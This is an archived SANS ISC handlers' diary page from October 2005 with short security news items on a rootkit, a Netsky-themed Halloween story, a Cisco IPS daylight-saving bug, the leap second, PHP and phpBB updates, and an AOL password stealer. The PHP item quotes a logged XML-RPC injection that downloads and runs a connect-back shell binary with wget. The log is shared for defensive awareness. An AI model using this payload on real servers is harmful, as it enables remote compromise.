Threat Level: green Handler on Duty: Jan Kopriva

SANS ISC: InfoSec Handlers Diary Blog InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Safemode rootkit & DRM

Published: 2005-10-31
Last Updated: 2005-11-01 12:38:49 UTC
by Patrick Nolan (Version: 1)
0 comment(s)
A news fwiw, there is a great analysis and commentary on a  rootkit made to run in safemode today at Mark's Sysinternals Blog today. Thanks very much for the great rootkit detection work and writing Mark!

F-Secure is also covering this in their blog.
Keywords:
0 comment(s)

Email From Beyond - Tell us your own Halloween stories

Published: 2005-10-31
Last Updated: 2005-10-31 19:58:01 UTC
by Tom Liston (Version: 1)
0 comment(s)
I'll start the Halloween ball rolling with a story of my own...  Send along your own tale of Internet strangeness, and around Midnight (GMT), I'll post some of the best...

I had known him for about 10 years when he died, too young, too soon.  He was the President of our local School Board, I was the Vice President.  We worked closely together on all of the topics and issues that face a School Board over the years.  Even through the times when the cancer made it difficult for him to go on.  He was that kind of man.

His name was John, and he was more than just my collegue... he was my friend.

He was also what I would call a computer nerd wannabe.  He loved geneology and created incredibly detailed databases of his own designing.  He was a sucker for the latest and greatest technology gizmos, and always had newer and cooler toys than me.  But when things got beyond the world of his pre-packaged software, he was out of his depth.  That's when I'd get a call.

I pulled more than a few viruses off of his machine, always leaving him with a gentle reminder about safe computer practices.  But I could never get frustrated with him.  The differences in our ages placed him squarely in the generation before me, and getting angry at him would be like getting angry at my dad... something that I just could never do.

The day that he died, I was both honored and terrified when his wife and daughter asked me to speak at his funeral.  What would I say?  How could I possibly sum up a life?

The funeral was to be in three days, and for two of those days I spent my time gathering facts about his life: his years of service at his job, his family history, his years on the School Board.  On the night before the funeral, I sat down at my laptop and stared at a blank Word document, trying to decide where to begin.

I wrote.  I wrote for about two hours, putting down a listing of accomplishments, accolades, and achieviements.  With each new item that I listed, a weight seemed to press down on me, more and more.  It just wasn't right.

Then, as I sat there looking at what I had written, the sound of a chime indicated that I had received a new email message.  I switched over to my email program and was incredibly startled to see that I had received an email message from, of all people, John.

The subject line read: "Thank you"

I flipped back over to Word, and opened a new document.  In about twenty minutes, I'd written a new eulogy with a very simple subject: "Thank you."  Thank you for all that you were.  Thank you for the difference you made.  Thank you for being you.

Although I never actually opened the email, I didn't need to look into the situation too closely to know what had happened.  One of the subject lines used by Netsky when it forged virus-laden email messages was "Thank you."

I still have that message, unopened, at the bottom of my in-box.
Keywords:
0 comment(s)

DST Cisco Surprise

Published: 2005-10-31
Last Updated: 2005-10-31 18:06:29 UTC
by Tom Liston (Version: 3)
0 comment(s)
Doh!  It seems that certain Cisco IPS systems can spit up a core file and go all brain-dead within 24 hours after a transition to or from daylight-savings-time.  You'll need a COO password to view the Cisco bulletin found here.

Update: If you don't have a COO account, you can still see the bulletin here. (Thanks, Tim!)

Clarification: The above probably implies that the IPS is completely dead.  In reality, monitoring and alarming remain functional.  The command-line interface (CLI) is what is curled up in the corner with its paws pointing skyward.
Keywords:
0 comment(s)

Leap second: when time stands still

Published: 2005-10-31
Last Updated: 2005-10-31 16:39:57 UTC
by Dan Goldberg (Version: 2)
0 comment(s)
Just after we in the US changed our clocks back an hour from daylight saving time to standard time I ran across an interesting tid-bit regarding time. This may have impacts across many information systems.
                      UTC TIME STEP
on the 1st of January 2006


A positive leap second will be introduced at the end of December 2005.
The sequence of dates of the UTC second markers will be:

2005 December 31, 23h 59m 59s
2005 December 31, 23h 59m 60s
2006 January 1, 0h 0m 0s

see: http://hpiers.obspm.fr/iers/bul/bulc/bulletinc.dat

This is being done to keep time in sync with the slowing earths rotation and the standard time measures in use in atomic clocks. There have been several leap seconds introduced since 1972. My original source for this information is the November 2005 Scientific American article by Wendy Grossman.  The impacts on information systems can come from GPS clocks not recognizing the leap second and  sending out flawed or inaccurate data with can affect many time based functions including security  features.  According to the article there is talk within the INTERNATIONAL EARTH ROTATION AND REFERENCE SYSTEMS SERVICE (IERS) (A united nations organization) of decoupling standard time measurement from the earth's rotation and adhering strictly to atomic decay.

NTP systems appear to be able to handle leap seconds: http://www.eecis.udel.edu/~mills/leap.html

Scientific American article here.

Happy travels through time ...
Dan Goldberg
Dan at madjic dot net

Keywords:
0 comment(s)

PHP and phpBB releases

Published: 2005-10-31
Last Updated: 2005-10-31 16:19:11 UTC
by Pedro Bueno (Version: 1)
0 comment(s)
We usually do not add news about software releases , but these two are kind of very important ones.
The first is about the new release of phpBB. This bulleting board system is very common and was target of some perl bots some time ago, due a vulnerability on its code. So, it is very important to keep up-to-date with the vendor.
The second one is the PHP itself. They just released a new version 4.4.1 and I would suggest you to keep up-to-date on this one too...

Today we received a post about some apache log entries regarding attempts to explore vulnerabilities on another php application, called xmlrpc.php. The entry was this one:

POST /wordpress/xmlrpc.php HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Type: text/xml
Content-Length:269

<xmlversion="1.0"><methodCall><methodName>test.method</methodName><params><param>
<value><name>',''));echo '_begin_';echo `cd /tmp;wget xxx.xxx.255.44/cback;chmod +x cback;./cback xxx.xxx.227.194 8080`;echo '_end_';exit;/*</name></value></param></params></methodCall>

This looks like they were targeting a vulnerability on xmlrpc.php. And according their website the new releases fixes some security vulnerabilties."Note: all users are encouraged to upgarde to release 1.2 or later,since known exploits exist for earlier versions.All use of eval as a potential remote code execution exploit has been removed in release 1.2. More info on the vulnerabilities can be found at the bottom of the page."
----------------------------------------------
Pedro Bueno ( pbueno //%// isc. sans. org)
Keywords:
0 comment(s)

(Another) AOL Pwstealer

Published: 2005-10-31
Last Updated: 2005-10-31 14:37:37 UTC
by Pedro Bueno (Version: 1)
0 comment(s)

Just a quick note about (another) one password stealer that we received today, focused on AOL. This one is not detected by any AV on Virustotal yet, althougth after I sent it to my personal AV list, some already answered that it will be included in the next signature's release.
This one had theĀ  name of new_pict.exe , maybe trying to fool the person to click on an attachment file.

If you run this file you will get this screen asking for a screen name and password.

------------------------------------------------
Pedro Bueno ( pbueno //%// isc. sans. org)

Keywords:
0 comment(s)
Diary Archives